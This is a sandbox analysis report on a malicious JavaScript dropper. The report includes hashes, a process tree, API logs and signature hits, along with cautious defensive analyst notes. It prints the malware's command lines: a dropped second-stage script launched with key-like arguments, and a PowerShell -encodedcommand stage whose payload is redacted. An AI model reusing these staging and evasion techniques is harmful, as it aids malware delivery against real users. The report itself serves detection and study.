Summary | ZeroBOX

unthriftily.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 May 24, 2023, 11:04 a.m. May 24, 2023, 11:06 a.m.
Size 224.6KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 3127d0f1530abf9479f6bbdb7bc3d87a
SHA256 20032f585b1170cebd621161beb9a36698636264b1e20f68d56931a14dfe30c6
CRC32 1CC13602
ssdeep 3072:j/seQmFP6G+XyAKOQ3uv1Xi4BahfeqW4u49daWf79kh4PtraTHZbCqS78gtb:j//3FPV+iAKO4QXijmqW4rTH4ZeqV2b
Yara None matched (static scan of the submitted file only; the DebuggerCheck__*/anti_dbg/disable_dep rule hits listed further down in the behavior section appear to come from process-memory scans of the spawned processes, not from this file on disk)

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\unthriftily.js

    3036
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
      Analyst note: the first stage drops a second script into C:\ProgramData (a location writable by standard users) and launches it with four dictionary-word arguments. Arguments like these are commonly consumed by the dropped script as a decryption key or execution guard, so re-running subclan.js without them may not reproduce the behavior — confirm by reading the dropped file before detonating it separately.

      2404
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
        Analyst note: -encodedcommand takes Base64-encoded UTF-16LE script text; the payload is redacted in this copy, so decode it (Base64 → UTF-16LE) from the original report to recover the actual PowerShell stage. The RWX memory allocations and the disable_dep/anti_dbg rule hits recorded for pid 1140 below belong to this process.

        1140

Name Response Post-Analysis Lookup
No hosts contacted (no DNS lookups, HTTP sessions or TLS handshakes were recorded during the roughly two-minute run).
IP Address Status Action
164.124.101.2 Active Moloch
Analyst note: this address appears with no DNS name, no Suricata alert and no TLS record; treat it as suspected sandbox or resolver infrastructure rather than a C2 indicator until the pcap shows what, if anything, was sent to it. The absence of network activity may also mean the final stage never ran to completion inside the analysis window.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
(Analyst note: blob_type 6 is PUBLICKEYBLOB and a NULL output buffer with a successful return is the documented CryptoAPI length-query pattern; every CryptExportKey entry in this section follows it, so these calls on their own show only that public keys were being sized for export, not which component issued them.)

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a418
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a5d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030aa18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
(Analyst note: this single call is what the AntiVM tag on this report rests on; querying physical memory is a common sandbox check, but it is also routine for runtime initialization, so treat it as a weak signal unless the decoded script branches on the returned size.)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02991000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02992000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02747000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02745000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02733000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02736000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02738000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
(Analyst note: the literal, unexpanded %ProgramData% segment under the user's Temp directory indicates the script concatenated the variable into the path without expanding it; the apparent target is the Start Menu "Windows PowerShell" shortcut, so check whether the decoded script reads or rewrites that .lnk for persistence.)
cmdline powershell -encodedcommand "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"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: wscript
parameters: "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
filepath: wscript
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -encodedcommand "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"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep (note: the PAGE_EXECUTE_READWRITE commits that trigger this rule in pid 1140 are 4 KB pages in a managed powershell.exe process, which a JIT-compiling runtime also produces; they do not by themselves prove a shellcode stage — corroborate with the decoded -encodedcommand payload)
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process powershell -encodedcommand "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"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
parent_process wscript.exe martian_process wscript "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
Process injection Process 3036 resumed a thread in remote process 2404
Process injection Process 2404 resumed a thread in remote process 1140
(Analyst note: both "injection" events pair with the ShellExecuteExW calls above and with the parent/child relationships in the process tree; resuming the initial thread of a child created by the same process is consistent with an ordinary process launch, so this signature should be read as a parent spawning a suspended child, not as code injection into an unrelated process, unless a WriteProcessMemory/NtMapViewOfSection into the target is also found.)
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2404
1 0 0

NtResumeThread

thread_handle: 0x00000340
suspend_count: 1
process_identifier: 1140
1 0 0
file C:\Windows\SysWOW64\wscript.exe
(Analyst note: the files listed below are the executables behind stock Windows 7 Start Menu shortcuts; combined with the .lnk access recorded earlier this is consistent with the script enumerating shortcut targets — possibly to choose a name or icon for a persistence shortcut — but that intent should be confirmed from the decoded script rather than assumed.)
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe